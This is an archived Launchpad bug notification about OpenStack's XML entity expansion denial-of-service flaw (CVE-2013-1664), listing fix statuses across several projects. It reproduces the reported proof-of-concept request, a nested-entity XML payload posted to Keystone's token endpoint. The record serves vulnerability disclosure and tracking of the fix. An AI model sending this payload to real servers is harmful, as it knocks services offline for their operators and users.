← Back to team overview

yahoo-eng-team team mailing list archive

[Bug 1100282] Re: DoS through XML entity expansion (CVE-2013-1664)

 

** Also affects: ossa
   Importance: Undecided
       Status: New

** Summary changed:

- DoS through XML entity expansion (CVE-2013-1664)
+ [OSSA 2013-004] DoS through XML entity expansion (CVE-2013-1664)

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to quantum.
https://bugs.launchpad.net/bugs/1100282

Title:
  [OSSA 2013-004] DoS through XML entity expansion (CVE-2013-1664)

Status in Cinder:
  Fix Released
Status in Cinder folsom series:
  Fix Released
Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Compute (Nova):
  Fix Released
Status in OpenStack Compute (nova) essex series:
  Fix Committed
Status in OpenStack Compute (nova) folsom series:
  Fix Released
Status in Oslo - a Library of Common OpenStack Code:
  Fix Released
Status in oslo grizzly series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released
Status in OpenStack Quantum (virtual network service):
  Fix Released

Bug description:
  Jonathan Murray from NCC Group reported that you can DoS keystone
  servers using XML entities in Keystone requests.

  [ Joshua Harlow from Yahoo! independently reported the same issue
  plaguing Nova (using minidom). ]

  POST /v2.0/tokens HTTP/1.1
  content-type: application/xml

  <!DOCTYPE foo [
  <!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
  ]>
  <auth>
  <tenantName>&c;</tenantName>
  <passwordCredentials>
  <username>&c;</username>
  <username>&c;</username>
  <username>&c;</username>
  <username>&c;</username>
  <password>&c;</password>
  <somethingElse>&c;</somethingElse>
  <somethingElse1>&c;</somethingElse1>
  <somethingElse2>&c;</somethingElse2>
  </passwordCredentials>
  </auth>

  In that precise case it might be an issue with the XML library we use,
  although it sounds generally safer to disable parsing ENTITY blocks
  entirely if we can.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/1100282/+subscriptions